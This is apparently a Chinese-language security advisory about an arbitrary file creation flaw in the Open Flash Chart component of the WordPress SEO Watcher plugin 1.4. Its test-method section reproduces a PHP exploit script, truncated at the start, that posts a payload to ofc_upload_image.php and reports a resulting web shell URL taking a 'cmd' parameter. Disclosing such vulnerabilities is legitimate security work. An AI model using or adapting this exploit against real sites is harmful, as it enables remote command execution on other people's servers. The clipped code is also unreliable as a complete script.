WordPress SEO Watcher插件Open Flash Chart任意文件创建漏洞

漏洞起因
输入验证错误
危险等级

影响系统
WordPress SEO Watcher Plugin 1.4

不受影响系统

危害
远程攻击者可以利用漏洞可创建任意文件并以WEB权限执行。
CVSSv2:

攻击所需条件
攻击者必须访问WordPress SEO Watcher。

漏洞信息
WordPress是一种使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设自己的网志。
WordPress SEO Watcher所绑定的Open Flash Chart存在”php-ofc-library/ofc_upload_image.php”脚本不正确过滤用户传递给”name”和”HTTP_RAW_POST_DATA”参数的数据,允许远程攻击者利用漏洞创建以PHP扩展的文件,并以WEB权限执行。

测试方法
“;
$headers = array(‘User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1’,
‘Content-Type: text/plain’);
echo ” [+] Submitting request to: {$options[‘u’]}\n”;
$handle = curl_init();
curl_setopt($handle, CURLOPT_URL, $url);
curl_setopt($handle, CURLOPT_HTTPHEADER, $headers);
curl_setopt($handle, CURLOPT_POSTFIELDS, $data);
curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);
$source = curl_exec($handle);
curl_close($handle);
if(!strpos($source, ‘Undefined variable: HTTP_RAW_POST_DATA’) && @fopen($shell, ‘r’))
{
echo ” [+] Exploit completed successfully!\n”;
echo ” ______________________________________________\n\n {$shell}?cmd=system(‘id’);\n”;
}
else
{
die(” [+] Exploit was unsuccessful.\n”);
}
?>
安全建议

厂商解决方案
目前没有详细解决方案提供:
http://seo-watcher.net/

漏洞提供者
wantexz

评论关闭。